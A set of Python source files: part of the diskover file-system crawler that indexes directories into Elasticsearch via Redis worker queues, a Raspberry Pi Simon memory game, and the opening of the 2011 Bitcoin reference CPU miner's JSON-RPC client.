parser.add_argument("--crawlapi", action="store_true",
help="Use storage Restful API instead of scandir")
parser.add_argument("--storagent", metavar='HOST', nargs='+',
help="Use diskover Storage Agent instead of scandir")
parser.add_argument("--dircalcsonly", action="store_true",
help="Calculate sizes and item counts for each directory doc in existing index \
(done automatically after each crawl)")
parser.add_argument("--gourcert", action="store_true",
help="Get realtime crawl data from ES for gource")
parser.add_argument("--gourcemt", action="store_true",
help="Get file mtime data from ES for gource")
parser.add_argument("-q", "--quiet", action="store_true",
help="Runs with no output")
parser.add_argument("-v", "--verbose", action="store_true",
help="Increase output verbosity")
parser.add_argument("--debug", action="store_true",
help="Debug message output")
parser.add_argument("--listplugins", action="store_true",
help="List plugins")
parser.add_argument("-V", "--version", action="version",
version="diskover v%s" % version,
help="Prints version and exits")
args = parser.parse_args()
if args.index:
args.index = args.index.lower()
return args
def log_setup(cliargs):
"""This is the log set up function.
It configures log output for diskover.
"""
diskover_logger = logging.getLogger('diskover')
diskover_logger.setLevel(logging.INFO)
es_logger = logging.getLogger('elasticsearch')
es_logger.setLevel(logging.WARNING)
urllib3_logger = logging.getLogger('urllib3')
urllib3_logger.setLevel(logging.WARNING)
requests_logger = logging.getLogger('requests')
requests_logger.setLevel(logging.WARNING)
logging.addLevelName(
logging.INFO, "\033[1;32m%s\033[1;0m"
% logging.getLevelName(logging.INFO))
logging.addLevelName(
logging.WARNING, "\033[1;31m%s\033[1;0m"
% logging.getLevelName(logging.WARNING))
logging.addLevelName(
logging.ERROR, "\033[1;41m%s\033[1;0m"
% logging.getLevelName(logging.ERROR))
logging.addLevelName(
logging.DEBUG, "\033[1;33m%s\033[1;0m"
% logging.getLevelName(logging.DEBUG))
logformatter = '%(asctime)s [%(levelname)s][%(name)s] %(message)s'
loglevel = logging.INFO
logging.basicConfig(format=logformatter, level=loglevel)
if cliargs['verbose']:
diskover_logger.setLevel(logging.INFO)
es_logger.setLevel(logging.INFO)
urllib3_logger.setLevel(logging.INFO)
requests_logger.setLevel(logging.INFO)
if cliargs['debug']:
diskover_logger.setLevel(logging.DEBUG)
es_logger.setLevel(logging.DEBUG)
urllib3_logger.setLevel(logging.DEBUG)
requests_logger.setLevel(logging.DEBUG)
if cliargs['quiet']:
diskover_logger.disabled = True
es_logger.disabled = True
urllib3_logger.disabled = True
requests_logger.disabled = True
return diskover_logger
def progress_bar(event):
if event == 'Checking' or event == 'Calculating':
widgets = [progressbar.AnimatedMarker(), ' ', event + ' (Queue: ', progressbar.Counter(), ') ', progressbar.Timer()]
bar = progressbar.ProgressBar(widgets=widgets, max_value=progressbar.UnknownLength)
else:
widgets = [event + ' ', progressbar.Bar(), progressbar.Percentage(),
' (', progressbar.Timer(), ', ', progressbar.ETA(), ')']
bar = progressbar.ProgressBar(widgets=widgets, max_value=100)
return bar
def adaptive_batch(q, cliargs, batchsize):
"""This is the adaptive batch function.
    It auto-adjusts the batch size sent to rq.
Could be made better :)
"""
q_len = len(q)
if q_len == 0:
if (batchsize - ab_step) >= ab_start:
batchsize = batchsize - ab_step
elif q_len > 0:
if (batchsize + ab_step) <= ab_max:
batchsize = batchsize + ab_step
cliargs['batchsize'] = batchsize
return batchsize
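# e.g. assuming ab_start/ab_step/ab_max mirror the adaptivebatch config
# defaults (50/10/500, set elsewhere in this file): an empty rq queue shrinks
# the batch toward ab_start (bots are keeping up), a non-empty queue grows it
# toward ab_max to cut enqueue overhead.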
def calc_dir_sizes(cliargs, logger, path=None):
from diskover_bot_module import calc_dir_size
jobcount = 0
# max depth to calc dir sizes
maxdepth = cliargs['maxdcdepth']
index = cliargs['index']
try:
# wait for worker bots to be idle and all queues are empty
logger.info('Waiting for diskover worker bots to be done with any jobs in rq...')
while worker_bots_busy([q, q_crawl, q_calc]):
time.sleep(1)
if cliargs['adaptivebatch']:
batchsize = ab_start
else:
batchsize = cliargs['batchsize']
if cliargs['verbose'] or cliargs['debug']:
logger.info('Batch size: %s' % batchsize)
# use generator and yield docs while scrolling index in es
logger.info('Getting diskover bots to calculate directory sizes (maxdepth %s)...' % maxdepth)
if not cliargs['quiet'] and not cliargs['debug'] and not cliargs['verbose']:
bar = progress_bar('Calculating')
bar.start()
else:
bar = None
data = _index_get_docs_data(index, cliargs, logger, path=path, maxdepth=maxdepth)
# refresh index
es.indices.refresh(index)
starttime = time.time()
# search es and start scroll
res = es.search(index=index, doc_type='directory', scroll='1m',
size=config['es_scrollsize'], body=data, request_timeout=config['es_timeout'])
dirlist = []
dircount = 0
while res['hits']['hits'] and len(res['hits']['hits']) > 0:
for hit in res['hits']['hits']:
fullpath = os.path.join(hit['_source']['path_parent'], hit['_source']['filename'])
# convert es time to unix time format
mtime = time.mktime(datetime.strptime(hit['_source']['last_modified'],
'%Y-%m-%dT%H:%M:%S').timetuple())
atime = time.mktime(datetime.strptime(hit['_source']['last_access'],
'%Y-%m-%dT%H:%M:%S').timetuple())
ctime = time.mktime(datetime.strptime(hit['_source']['last_change'],
'%Y-%m-%dT%H:%M:%S').timetuple())
dirlist.append((hit['_id'], fullpath, mtime, atime, ctime))
dircount += 1
dirlist_len = len(dirlist)
if dirlist_len >= batchsize:
q_calc.enqueue(calc_dir_size, args=(dirlist, cliargs,), result_ttl=config['redis_ttl'])
jobcount += 1
if cliargs['debug'] or cliargs['verbose']:
logger.info("enqueued batchsize: %s (batchsize: %s)" % (dirlist_len, batchsize))
del dirlist[:]
if cliargs['adaptivebatch']:
batchsize = adaptive_batch(q_crawl, cliargs, batchsize)
if cliargs['debug'] or cliargs['verbose']:
logger.info("batchsize set to: %s" % batchsize)
# update progress bar
if bar:
try:
bar.update(len(q_calc))
except (ZeroDivisionError, ValueError):
bar.update(0)
# use es scroll api
res = es.scroll(scroll_id=res['_scroll_id'], scroll='1m',
request_timeout=config['es_timeout'])
# enqueue dir calc job for any remaining in dirlist
if len(dirlist) > 0:
q_calc.enqueue(calc_dir_size, args=(dirlist, cliargs,), result_ttl=config['redis_ttl'])
jobcount += 1
logger.info('Found %s directory docs' % str(dircount))
# set up progress bar with time remaining
if bar:
bar.finish()
bar_max_val = len(q_calc)
bar = progressbar.ProgressBar(max_value=bar_max_val)
bar.start()
# update progress bar until all worker bots are idle and q_calc queue is empty
while worker_bots_busy([q_calc]):
if bar:
q_len = len(q_calc)
try:
bar.update(bar_max_val - q_len)
except (ZeroDivisionError, ValueError):
bar.update(0)
time.sleep(1)
if bar:
bar.finish()
elapsed = get_time(time.time() - starttime)
logger.info('Finished calculating %s directory sizes in %s' % (dircount, elapsed))
except KeyboardInterrupt:
print("Ctrl-c keyboard interrupt, shutting down...")
sys.exit(0)
def scandirwalk_worker(threadn, cliargs, logger):
dirs = []
nondirs = []
# check if we are using storage agent and make connection
if cliargs['storagent']:
stor_agent = True
hostlist = cliargs['storagent']
stor_agent_conn = diskover_agent.AgentConnection(hosts=hostlist)
stor_agent_conn.connect()
if cliargs['debug'] or cliargs['verbose']:
logger.info("[thread-%s] Connected to Storage Agent host: %s" % (threadn, stor_agent_conn.conn_host()))
else:
stor_agent = False
while True:
path = q_paths.get()
try:
q_paths_in_progress.put(path)
if cliargs['debug'] or cliargs['verbose']:
logger.info("[thread-%s] scandirwalk_worker: %s" % (threadn, path))
if cliargs['crawlapi']:
root, api_dirs, api_nondirs = api_listdir(path, api_ses)
path = root
for d in api_dirs:
if not dir_excluded(d[0], config, cliargs):
dirs.append(d)
if not cliargs['dirsonly']:
for f in api_nondirs:
nondirs.append(f)
del api_dirs[:]
del api_nondirs[:]
elif stor_agent:
# grab dir list from storage agent server
dir_list = stor_agent_conn.listdir(path)
logger.debug("[thread-%s] scandirwalk_worker: Storage Agent host response time: %s" % (threadn, stor_agent_conn.response_time()))
path, dirs_noexcl, nondirs = dir_list
for d in dirs_noexcl:
if not dir_excluded(d, config, cliargs):
dirs.append(d)
else:
item_count = 0
for entry in scandir(path):
if entry.is_dir(follow_symlinks=False) and not dir_excluded(entry.path, config, cliargs):
dirs.append(entry.name)
elif entry.is_file(follow_symlinks=False) and not cliargs['dirsonly']:
nondirs.append(entry.name)
                    item_count += 1
                    # log once when a directory crosses the 100k-entry mark
                    if item_count == 100000 and (cliargs['debug'] or cliargs['verbose']):
                        logger.info("[thread-%s] scandirwalk_worker: processing directory with many files: %s" % (threadn, path))
q_paths_results.put((path, dirs[:], nondirs[:]))
except (OSError, IOError) as e:
logger.warning("[thread-%s] OS/IO Exception caused by: %s" % (threadn, e))
pass
except UnicodeDecodeError as e:
logger.warning("[thread-%s] Unicode Decode Exception caused by: %s (path: %s)" % (threadn, e, path))
pass
except Exception as e:
logger.error("[thread-%s] Exception caused by: %s" % (threadn, e))
raise
finally:
q_paths_in_progress.get()
del dirs[:]
del nondirs[:]
q_paths.task_done()
def scandirwalk(path, cliargs, logger):
q_paths.put(path)
while True:
entry = q_paths_results.get()
root, dirs, nondirs = entry
if cliargs['debug'] or cliargs['verbose']:
if cliargs['crawlapi']:
logger.info("apiwalk: %s (dircount: %s, filecount: %s)" % (root[0], str(len(dirs)), str(len(nondirs))))
else:
logger.info("scandirwalk: %s (dircount: %s, filecount: %s)" % (root, str(len(dirs)), str(len(nondirs))))
# yield before recursion
yield root, dirs, nondirs
# recurse into subdirectories
if cliargs['crawlapi']:
for d in dirs:
q_paths.put(d[0])
else:
for name in dirs:
new_path = os.path.join(root, name)
q_paths.put(new_path)
q_paths_results.task_done()
if q_paths_results.qsize() == 0 and q_paths.qsize() == 0:
time.sleep(.5)
if q_paths_results.qsize() == 0 and q_paths.qsize() == 0 and q_paths_in_progress.qsize() == 0:
break
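# scandirwalk() above is a queue-driven replacement for os.walk(): worker
# threads pull paths from q_paths and push (root, dirs, nondirs) tuples to
# q_paths_results, while q_paths_in_progress tracks in-flight paths so the
# generator only terminates once all three queues have drained.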
def treewalk(top, num_sep, level, batchsize, cliargs, logger, reindex_dict):
"""This is the tree walk function.
It walks the tree and adds tuple of directory and it's items
to redis queue for rq worker bots to scrape meta and upload
to ES index after batch size (dir count) has been reached.
"""
from diskover_bot_module import scrape_tree_meta
batch = []
dircount = 0
totaldirs = 0
totalfiles = 0
starttime = time.time()
# set up threads for tree walk
for i in range(cliargs['walkthreads']):
t = Thread(target=scandirwalk_worker, args=(i, cliargs, logger,))
t.daemon = True
t.start()
# set up progress bar
if not cliargs['quiet'] and not cliargs['debug'] and not cliargs['verbose']:
widgets = [progressbar.AnimatedMarker(), ' Crawling (Queue: ', progressbar.Counter(),
progressbar.FormatLabel(''), ') ', progressbar.Timer()]
bar = progressbar.ProgressBar(widgets=widgets, max_value=progressbar.UnknownLength)
bar.start()
else:
bar = None
bartimestamp = time.time()
for root, dirs, files in scandirwalk(top, cliargs, logger):
dircount += 1
totaldirs += 1
files_len = len(files)
dirs_len = len(dirs)
# check for empty dirs
if not cliargs['indexemptydirs'] and not cliargs['dirsonly']:
if dirs_len == 0 and files_len == 0:
if cliargs['debug'] or cliargs['verbose']:
logger.info("skipping empty dir: %s" % root)
continue
totalfiles += files_len
# replace path if cliarg
if cliargs['replacepath']:
root = replace_path(root)
if cliargs['dirsonly']:
batch.append((root, dirs))
else:
batch.append((root, dirs, files))
batch_len = len(batch)
if batch_len >= batchsize or (cliargs['adaptivebatch'] and totalfiles >= config['adaptivebatch_maxfiles']):
q_crawl.enqueue(scrape_tree_meta, args=(batch, cliargs, reindex_dict,),
result_ttl=config['redis_ttl'])
if cliargs['debug'] or cliargs['verbose']:
logger.info("enqueued batchsize: %s (batchsize: %s)" % (batch_len, batchsize))
del batch[:]
totalfiles = 0
if cliargs['adaptivebatch']:
batchsize = adaptive_batch(q_crawl, cliargs, batchsize)
if cliargs['debug'] or cliargs['verbose']:
logger.info("batchsize set to: %s" % batchsize)
# check if at maxdepth level and delete dirs/files lists to not
# descend further down the tree
if cliargs['maxdepth']:
num_sep_this = root.count(os.path.sep)
if num_sep + level <= num_sep_this:
del dirs[:]
del files[:]
# update progress bar
if bar:
try:
if time.time() - bartimestamp >= 2:
elapsed = round(time.time() - bartimestamp, 3)
dirspersec = round(dircount / elapsed, 3)
widgets[4] = progressbar.FormatLabel(', ' + str(dirspersec) + ' dirs/sec) ')
bartimestamp = time.time()
dircount = 0
bar.update(len(q_crawl))
except (ZeroDivisionError, ValueError):
bar.update(0)
# add any remaining in batch to queue
if len(batch) > 0:
q_crawl.enqueue(scrape_tree_meta, args=(batch, cliargs, reindex_dict,), result_ttl=config['redis_ttl'])
# set up progress bar with time remaining
if bar:
bar.finish()
bar_max_val = len(q_crawl)
bar = progressbar.ProgressBar(max_value=bar_max_val)
bar.start()
# update progress bar until bots are idle and queue is empty
while worker_bots_busy([q_crawl]):
if bar:
q_len = len(q_crawl)
try:
bar.update(bar_max_val - q_len)
except (ZeroDivisionError, ValueError):
bar.update(0)
time.sleep(1)
if bar:
bar.finish()
elapsed = time.time() - starttime
dirspersec = round(totaldirs / elapsed, 3)
elapsed = get_time(elapsed)
logger.info("Finished crawling in %s, dirs walked %s (%s dirs/sec)" %
(elapsed, totaldirs, dirspersec))
def crawl_tree(path, cliargs, logger, reindex_dict):
"""This is the crawl tree function.
It sets up the directory tree walking.
"""
try:
wait_for_worker_bots(logger)
logger.info('Enqueueing crawl to diskover worker bots for %s...', path)
if cliargs['autotag']:
logger.info("Worker bots set to auto-tag (-A)")
if cliargs['sizeondisk']:
logger.info("Storing on disk size instead of file size using a blocksize of %s (-S)" % cliargs['blocksize'])
if cliargs['adaptivebatch']:
batchsize = ab_start
cliargs['batchsize'] = batchsize
logger.info("Sending adaptive batches to worker bots (-a)")
if cliargs['verbose'] or cliargs['debug']:
logger.info('Batch size: %s' % batchsize)
else:
batchsize = cliargs['batchsize']
if cliargs['verbose'] or cliargs['debug']:
logger.info('Batch size: %s' % batchsize)
logger.info("Sending batches of %s to worker bots", batchsize)
if batchsize < 50:
logger.warning("Using a small batch size can decrease performance")
# set maxdepth level to 1 if reindex
if cliargs['reindex']:
level = 1
cliargs['maxdepth'] = 1
else:
level = cliargs['maxdepth']
# set current depth
num_sep = path.count(os.path.sep)
# check for listenlwc socket cli flag to start socket server
if cliargs['listentwc']:
from diskover_socket_server import start_socket_server_twc
starttime = start_socket_server_twc(rootdir_path, num_sep, level, batchsize, cliargs, logger, reindex_dict)
return starttime
starttime = time.time()
logger.info("Starting crawl using %s treewalk threads (maxdepth %s)" % (cliargs['walkthreads'], cliargs['maxdepth']))
# start tree walking
treewalk(path, num_sep, level, batchsize, cliargs, logger, reindex_dict)
return starttime
except KeyboardInterrupt:
print("Ctrl-c keyboard interrupt, shutting down...")
sys.exit(0)
def hotdirs():
    """This is the calculate hot dirs function.
    """
    from diskover_bot_module import calc_hot_dirs
logger.info('Getting diskover bots to calculate change percent '
'for directories from %s to %s',
cliargs['hotdirs'], cliargs['index'])
# look in index for all directory docs and add to queue
dirlist = index_get_docs(cliargs, logger, doctype='directory', hotdirs=True, index=cliargs['index'])
dirbatch = []
if cliargs['adaptivebatch']:
batchsize = ab_start
else:
batchsize = cliargs['batchsize']
if cliargs['verbose'] or cliargs['debug']:
logger.info('Batch size: %s' % batchsize)
for d in dirlist:
dirbatch.append(d)
if len(dirbatch) >= batchsize:
q.enqueue(calc_hot_dirs, args=(dirbatch, cliargs,), result_ttl=config['redis_ttl'])
del dirbatch[:]
if cliargs['adaptivebatch']:
batchsize = adaptive_batch(q, cliargs, batchsize)
# add any remaining in batch to queue
q.enqueue(calc_hot_dirs, args=(dirbatch, cliargs,), result_ttl=config['redis_ttl'])
if not cliargs['quiet'] and not cliargs['debug'] and not cliargs['verbose']:
bar = progress_bar('Checking')
bar.start()
else:
bar = None
# update progress bar until all bots are idle and q queue is empty
while worker_bots_busy([q]):
if bar:
try:
bar.update(len(q))
except (ZeroDivisionError, ValueError):
bar.update(0)
time.sleep(1)
if bar:
bar.finish()
def worker_bots_busy(queues):
"""This is the worker bots busy function.
It returns True when bots are busy and queues have jobs,
else returns False when bots are all idle and queues are empty.
"""
workers_busy = False
workers = SimpleWorker.all(connection=redis_conn)
for worker in workers:
if worker._state == "busy":
workers_busy = True
break
q_len = 0
running_jobs = 0
for qname in queues:
q_len += len(qname)
r = StartedJobRegistry(queue=qname)
running_job_ids = r.get_job_ids()
running_jobs += len(running_job_ids)
    if q_len == 0 and running_jobs == 0 and not workers_busy:
return False
else:
return True
def wait_for_worker_bots(logger):
"""This is the wait for worker bots function.
It loops waiting for worker bots to start.
"""
workers = SimpleWorker.all(connection=redis_conn)
while len(workers) == 0:
logger.info('Waiting for diskover worker bots to start...')
time.sleep(2)
workers = SimpleWorker.all(connection=redis_conn)
logger.info('Found %s diskover RQ worker bots', len(workers))
def tune_es_for_crawl(defaults=False):
"""This is the tune es for crawl function.
It optimizes ES for crawling based on config settings and after crawl is over
sets back to defaults.
"""
if config['disable_replicas'] == 'true':
replicas = 0
else:
replicas = config['index_replicas']
default_settings = {
"index": {
"refresh_interval": "1s",
"number_of_replicas": config['index_replicas'],
"translog.flush_threshold_size": "512mb"
}
}
tuned_settings = {
"index": {
"refresh_interval": config['index_refresh'],
"number_of_replicas": replicas,
"translog.flush_threshold_size": config['index_translog_size']
}
}
if not defaults:
logger.info("Tuning ES index settings for crawl")
es.indices.put_settings(index=cliargs['index'], body=tuned_settings,
request_timeout=config['es_timeout'])
else:
logger.info("Setting ES index settings back to defaults")
es.indices.put_settings(index=cliargs['index'], body=default_settings,
request_timeout=config['es_timeout'])
# set logging level for es to ERROR to not output any warnings about timeouts for index optimizing
logging.getLogger('elasticsearch').setLevel(logging.ERROR)
logger.info("Force merging ES index...")
es.indices.forcemerge(index=cliargs['index'], request_timeout=config['es_timeout'])
# check if we should optimize index
if cliargs['optimizeindex']:
logger.info('Optimizing ES index... this could take a while... (-O)')
try:
es.indices.forcemerge(index=cliargs['index'], max_num_segments=1, request_timeout=config['es_timeout'])
except exceptions.ConnectionTimeout:
logger.info("Optimizing timed out, will finish in background")
pass
def post_crawl_tasks():
"""This is the post crawl tasks function.
It runs at the end of the crawl and does post tasks.
"""
# add elapsed time crawl stat to es
add_crawl_stats(es, cliargs['index'], rootdir_path, (time.time() - starttime), "finished_crawl")
# calculate directory sizes and items
if cliargs['reindex'] or cliargs['reindexrecurs']:
calc_path = rootdir_path
else:
calc_path = None
calc_dir_sizes(cliargs, logger, path=calc_path)
    # add elapsed time dircalc stat to es
add_crawl_stats(es, cliargs['index'], rootdir_path, (time.time() - starttime), "finished_dircalc")
if cliargs['reindex'] or cliargs['reindexrecurs']:
# wait for worker bots to be idle and all queues are empty
logger.info('Waiting for diskover worker bots to be done with any jobs in rq...')
while worker_bots_busy([q, q_crawl, q_calc]):
time.sleep(1)
# set Elasticsearch index settings back to default
tune_es_for_crawl(defaults=True)
def pre_crawl_tasks():
# create Elasticsearch index
index_create(cliargs['index'])
# add crawl stat to index
add_crawl_stats(es, cliargs['index'], rootdir_path, 0, "running")
# optimize Elasticsearch index settings for crawling
tune_es_for_crawl()
# add disk space info to es index
if not cliargs['reindex'] and not cliargs['reindexrecurs']:
if cliargs['crawlapi']:
from diskover_crawlapi import api_add_diskspace
api_add_diskspace(es, cliargs['index'], rootdir_path, api_ses, logger)
else:
add_diskspace(cliargs['index'], logger, rootdir_path)
# load config file into config dictionary
config, configfile = load_config()
# set adaptive batch sizes from config
ab_start = config['adaptivebatch_startsize']
ab_max = config['adaptivebatch_maxsize']
ab_step = config['adaptivebatch_stepsize']
# load any available plugins
plugins = load_plugins()
import diskover_connections
# create Elasticsearch connection
diskover_connections.connect_to_elasticsearch()
from diskover_connections import es_conn as es
from diskover_connections import exceptions
# create Redis connection
diskover_connections.connect_to_redis()
from diskover_connections import redis_conn
# Redis queue names
listen = [config['redis_queue'], config['redis_queue_crawl'], config['redis_queue_calcdir']]
# set up Redis q
q = Queue(listen[0], connection=redis_conn, default_timeout=config['redis_rq_timeout'])
q_crawl = Queue(listen[1], connection=redis_conn, default_timeout=config['redis_rq_timeout'])
q_calc = Queue(listen[2], connection=redis_conn, default_timeout=config['redis_rq_timeout'])
# queue for paths
q_paths = PyQueue()
q_paths_results = PyQueue()
q_paths_in_progress = PyQueue()
lock = Lock()
if __name__ == "__main__":
# parse cli arguments into cliargs dictionary
cliargs = vars(parse_cli_args(config['index']))
# set up logging
logger = log_setup(cliargs)
if not cliargs['quiet'] and not cliargs['gourcert'] and not cliargs['gourcemt']:
# print random banner
print_banner(version)
logger.info("Using config file: %s" % configfile)
# list plugins
if cliargs['listplugins']:
print("diskover plugins:")
list_plugins()
sys.exit(0)
# run just dir calcs if cli arg
if cliargs['dircalcsonly']:
calc_dir_sizes(cliargs, logger)
sys.exit(0)
try:
# check index name
if cliargs['index'] == "diskover" or \
cliargs['index'].split('-')[0] != "diskover":
print('Please name your index: diskover-<string>')
sys.exit(1)
except IndexError:
print('Please name your index: diskover-<string>')
sys.exit(1)
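    # e.g. "diskover-2019" passes the check above, while "diskover" alone or
    # "data-2019" exit with an error (added explanatory note)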
# check for listen socket cli flag to start socket server
if cliargs['listen']:
from diskover_socket_server import start_socket_server
start_socket_server(cliargs, logger)
sys.exit(0)
# check for gource cli flags
if cliargs['gourcert'] or cliargs['gourcemt']:
try:
from diskover_gource import gource
gource(es, cliargs)
except KeyboardInterrupt:
print('\nCtrl-c keyboard interrupt received, exiting')
sys.exit(0)
# tag duplicate files if cli argument
if cliargs['finddupes']:
from diskover_dupes import dupes_finder
wait_for_worker_bots(logger)
# Set up worker threads for duplicate file checker queue
dupes_finder(es, q, cliargs, logger)
logger.info('DONE checking for dupes! Sayonara!')
sys.exit(0)
# copy tags from index2 to index if cli argument
if cliargs['copytags']:
from diskover_bot_module import tag_copier
wait_for_worker_bots(logger)
logger.info('Copying tags from %s to %s', cliargs['copytags'], cliargs['index'])
# look in index2 for all directory docs with tags and add to queue
dirlist = index_get_docs(cliargs, logger, doctype='directory', copytags=True, index=cliargs['copytags'])
for path in dirlist:
q.enqueue(tag_copier, args=(path, cliargs,), result_ttl=config['redis_ttl'])
# look in index2 for all file docs with tags and add to queue
filelist = index_get_docs(cliargs, logger, doctype='file', copytags=True, index=cliargs['copytags'])
for path in filelist:
q.enqueue(tag_copier, args=(path, cliargs,), result_ttl=config['redis_ttl'])
if len(dirlist) == 0 and len(filelist) == 0:
logger.info('No tags to copy')
else:
logger.info('Worker bots copying tags in background')
logger.info('Dispatcher is DONE! Sayonara!')
sys.exit(0)
# Calculate directory change percent from index2 to index if cli argument
if cliargs['hotdirs']:
wait_for_worker_bots(logger)
hotdirs()
logger.info('DONE finding hotdirs! Sayonara!')
sys.exit(0)
# print plugins
plugins_list = ""
for i in get_plugins_info():
plugins_list = plugins_list + i["name"] + " "
if plugins:
logger.info("Plugins loaded: %s", plugins_list)
# check if rootdir exists
if cliargs['crawlapi']:
if cliargs['rootdir'] == '.' or cliargs['rootdir'] == "":
logger.error("Rootdir path missing, use -d /rootdir, exiting")
sys.exit(1)
from diskover_crawlapi import api_connection, api_stat, api_listdir
logger.info('Connecting to file system storage api at %s... (--crawlapi)' % config['api_url'])
api_ses = api_connection()
logger.info('Connected to storage api')
# check using storage api
try:
api_stat(cliargs['rootdir'], api_ses)
except ValueError as e:
logger.error("Rootdir path not found or not a directory, exiting (%s)" % e)
sys.exit(1)
elif cliargs['storagent']:
try:
import diskover_agent
except ImportError:
logger.error("Missing diskover_agent.py module, exiting")
sys.exit(1)
else:
# warn if not running as root (linux) or Administrator (windows)
try:
is_admin = os.geteuid() == 0
user = "root"
except AttributeError: # windows
import ctypes
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
user = "Administrator"
if not is_admin:
logger.warning('Not running as %s, permissions might block crawling some files' % user)
if not os.path.exists(cliargs['rootdir']) or not \
os.path.isdir(cliargs['rootdir']):
logger.error("Rootdir path not found or not a directory, exiting")
sys.exit(1)
logger.debug('Excluded dirs: %s', config['excluded_dirs'])
# set rootdir_path to absolute path
rootdir_path = os.path.abspath(cliargs['rootdir'])
# remove any trailing slash unless root /
if rootdir_path != '/':
rootdir_path = rootdir_path.rstrip(os.path.sep)
# check exclude
if dir_excluded(rootdir_path, config, cliargs):
logger.info("Directory in exclude list, exiting")
sys.exit(0)
cliargs['rootdir'] = rootdir_path
# convert to unicode if python2
if not IS_PY3:
rootdir_path = unicode(rootdir_path)
# warn if indexing 0 Byte empty files
if cliargs['minsize'] == 0:
logger.warning('You are indexing 0 Byte empty files (-s 0)')
# check if we are reindexing and remove existing docs in Elasticsearch
# before crawling and reindexing
reindex_dict = {'file': [], 'directory': []}
if cliargs['reindex']:
reindex_dict = index_delete_path(rootdir_path, cliargs, logger, reindex_dict)
elif cliargs['reindexrecurs']:
reindex_dict = index_delete_path(rootdir_path, cliargs, logger, reindex_dict, recursive=True)
pre_crawl_tasks()
# start crawling
starttime = crawl_tree(rootdir_path, cliargs, logger, reindex_dict)
post_crawl_tasks()
logger.info('All DONE! Sayonara!')
|
Simon.py
|
import RPi.GPIO as GPIO
#import GPIOmock as GPIO
import threading
import time
import random
import os
from subprocess import call
# green, red, blue, yellow
LIGHTS = [33, 37, 35, 31]
BUTTONS = [11, 15, 13, 7]
NOTES = ["E3", "A4", "E4", "Cs4"]
# values you can change that affect game play
speed = 0.25
use_sounds = True
# flags used to signal game status
is_displaying_pattern = False
is_won_current_level = False
is_game_over = False
# game state
current_level = 1
current_step_of_level = 0
pattern = []
def play_note(note):
if use_sounds:
call(["sonic_pi", "play :" + note])
def initialize_gpio():
GPIO.setmode(GPIO.BOARD)
GPIO.setup(LIGHTS, GPIO.OUT, initial=GPIO.LOW)
GPIO.setup(BUTTONS, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
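    # Added note: register an interrupt callback per button; the last
    # positional argument to add_event_detect() is RPi.GPIO's debounce time
    # in milliseconds, set longer when sounds are enabled (presumably because
    # the blocking sonic_pi subprocess call slows the handler down).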
for i in range(4):
GPIO.add_event_detect(BUTTONS[i], GPIO.FALLING, verify_player_selection, 400 if use_sounds else 250)
def verify_player_selection(channel):
global current_step_of_level, current_level, is_won_current_level, is_game_over
if not is_displaying_pattern and not is_won_current_level and not is_game_over:
play_note(NOTES[BUTTONS.index(channel)])
flash_led_for_button(channel)
if channel == BUTTONS[pattern[current_step_of_level]]:
current_step_of_level += 1
if current_step_of_level >= current_level:
current_level += 1
is_won_current_level = True
else:
is_game_over = True
def flash_led_for_button(button_channel):
led = LIGHTS[BUTTONS.index(button_channel)]
GPIO.output(led, GPIO.HIGH)
time.sleep(0.1)
GPIO.output(led, GPIO.LOW)
def add_new_color_to_pattern():
global is_won_current_level, current_step_of_level
is_won_current_level = False
current_step_of_level = 0
next_color = random.randint(0, 3)
pattern.append(next_color)
def display_pattern_to_player():
global is_displaying_pattern
is_displaying_pattern = True
GPIO.output(LIGHTS, GPIO.LOW)
for i in range(current_level):
play_note(NOTES[pattern[i]])
GPIO.output(LIGHTS[pattern[i]], GPIO.HIGH)
time.sleep(speed)
GPIO.output(LIGHTS[pattern[i]], GPIO.LOW)
time.sleep(speed)
is_displaying_pattern = False
def wait_for_player_to_repeat_pattern():
while not is_won_current_level and not is_game_over:
time.sleep(0.1)
def reset_board_for_new_game():
global is_displaying_pattern, is_won_current_level, is_game_over
global current_level, current_step_of_level, pattern
is_displaying_pattern = False
is_won_current_level = False
is_game_over = False
current_level = 1
current_step_of_level = 0
pattern = []
GPIO.output(LIGHTS, GPIO.LOW)
def start_game():
while True:
add_new_color_to_pattern()
display_pattern_to_player()
wait_for_player_to_repeat_pattern()
if is_game_over:
print("Game Over! Your max score was {} colors!\n".format(current_level-1))
play_again = input("Enter 'Y' to play again, or just press [ENTER] to exit.\n")
if play_again == "Y" or play_again == "y":
reset_board_for_new_game()
print("Begin new round!\n")
else:
print("Thanks for playing!\n")
break
time.sleep(2)
def start_game_monitor():
t = threading.Thread(target=start_game)
t.daemon = True
t.start()
t.join()
def main():
try:
call(["sonic_pi", "set_sched_ahead_time! 0"])
call(["sonic_pi", "use_debug false"])
call(["sonic_pi", "use_synth :pulse"])
call(["sonic_pi", "use_bpm 100"])
os.system('cls' if os.name == 'nt' else 'clear')
print("Begin new round!\n")
initialize_gpio()
start_game_monitor()
finally:
GPIO.cleanup()
if __name__ == '__main__':
main()
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
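# Illustrative usage (added note; host and credentials are placeholders):
#   rpc = BitcoinRPC('127.0.0.1', 8332, 'rpcuser', 'rpcpass')
#   work = rpc.getwork()           # fetch work: {'data': ..., 'target': ...}
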